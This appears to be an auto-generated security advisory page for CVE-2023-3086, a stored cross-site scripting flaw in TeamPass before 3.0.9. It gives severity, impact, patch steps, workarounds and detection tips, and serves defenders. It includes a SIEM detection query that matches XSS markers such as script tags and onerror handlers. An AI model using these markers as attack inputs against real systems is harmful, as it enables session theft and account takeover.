CVE-2023-3086 – This stored cross-site scripting (XSS) vulnerab... (How to Fix)

Q: What is the severity of CVE-2023-3086?

CVE-2023-3086 has a CVSS score of 9.0 (CRITICAL). This stored cross-site scripting (XSS) vulnerability in TeamPass allows attackers to inject malicious scripts into the application, which are then executed when other users view the affected content. It affects all TeamPass instances running versions prior to 3.0.9. Users who access compromised TeamPass instances could have their sessions hijacked or sensitive information stolen.

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in TeamPass allows attackers to inject malicious scripts into the application, which are then executed when other users view the affected content. It affects all TeamPass instances running versions prior to 3.0.9. Users who access compromised TeamPass instances could have their sessions hijacked or sensitive information stolen.

💻 Affected Systems

Products:

TeamPass

Versions: All versions prior to 3.0.9

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: All TeamPass deployments using vulnerable versions are affected regardless of configuration.

📦 What is this software?

Teampass by Teampass

View all CVEs affecting Teampass →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, gain full control of the TeamPass instance, and exfiltrate all stored passwords and sensitive data.

🟠

Likely Case

Attackers inject malicious scripts to steal user session cookies, leading to account takeover and potential access to stored credentials.

🟢

If Mitigated

With proper input validation and output encoding, the impact is limited to failed injection attempts with no successful exploitation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access but the vulnerability is easy to exploit once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.9

Vendor Advisory: https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79

Restart Required: No

Instructions:

1. Backup your TeamPass database and configuration. 2. Download TeamPass 3.0.9 or later from the official repository. 3. Replace the existing installation files with the patched version. 4. Verify the installation is working correctly.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize user inputs before processing.

Content Security Policy

all

Implement a strict Content Security Policy header to mitigate XSS impact.

Add to web server configuration: Content-Security-Policy: default-src 'self'; script-src 'self'

🧯 If You Can't Patch

Implement a web application firewall (WAF) with XSS protection rules
Restrict user permissions to minimize attack surface and limit what authenticated users can modify

🔍 How to Verify

Check if Vulnerable:

Check the TeamPass version in the application settings or by examining the source code files for version markers.

Check Version:

Check the version in TeamPass admin interface or examine includes/config.php for version information

Verify Fix Applied:

Verify the installation is running version 3.0.9 or later and test XSS payloads to confirm they are properly sanitized.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests with script tags or JavaScript payloads
Multiple failed login attempts followed by successful authentication

Network Indicators:

HTTP requests containing suspicious script tags or encoded JavaScript
Outbound connections to unknown domains following user interactions

SIEM Query:

source="teampass_logs" AND (http_method="POST" AND (uri="*<script*" OR uri="*javascript:*" OR uri="*onerror=*"))

📊 Metadata

CVE ID: CVE-2023-3086

CVSS v3 Score: 9.0 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-79

Published: June 3, 2023

Last Updated: November 21, 2024

🔗 References

https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79 Patch
https://huntr.dev/bounties/17be9e8a-abe8-41db-987f-1d5b0686ae20 Exploit,Patch,Third Party Advisory
https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79 Patch
https://huntr.dev/bounties/17be9e8a-abe8-41db-987f-1d5b0686ae20 Exploit,Patch,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-3086, you might also want to check these: